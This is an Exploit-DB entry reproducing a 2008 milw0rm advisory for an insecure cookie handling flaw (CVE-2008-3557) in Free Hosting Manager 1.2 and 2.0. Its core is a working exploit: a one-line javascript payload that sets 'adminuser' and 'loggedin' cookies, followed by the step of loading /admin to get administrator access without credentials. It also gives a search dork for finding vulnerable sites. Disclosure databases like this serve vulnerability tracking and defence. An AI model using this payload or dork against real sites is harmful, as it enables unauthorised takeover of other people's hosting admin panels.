Free Hosting Manager 1.2/2.0 Insecure Cookie Handling Vulnerability

2008-08-06T00:00:00
ID EDB-ID:6213
Type exploitdb
Reporter Scary-Boys
Modified 2008-08-06T00:00:00

Description

Free Hosting Manager 1.2/2.0 Insecure Cookie Handling Vulnerability. CVE-2008-3557. Webapps exploit for php platform

                                        
                                            #########################################################################
#                                                                       #
#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability#
#                                                                       #
#########################################################################
#                                                                       #
# AUTHOR     : Scary-Boys                                               #
# HOME       : http://scary-boys.com                                    #
# Founded By : lvlr-Erfan                                               #
# Download   : http://www.fhm-script.com/download.php                   #
#                                                                       #
#########################################################################
#                                                                       #
#     DorKs  : "Powered By Free Hosting Manager"                        #
#                                                                       #
#########################################################################
#                                                                       #
#  DESCRIPTION :                                                        #
# the admin panel only checks if the cookie exists.                     #
#                                                                       #
#########################################################################
#                                                                       #
#  Vulnerability :                                                      #
#                                                                       #
#  javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";
#                                                                       #
#########################################################################
#                                                                       #
# after running the javascript, Go to "/admin" & Refresh      #
#                                                                       #
#########################################################################

# milw0rm.com [2008-08-06]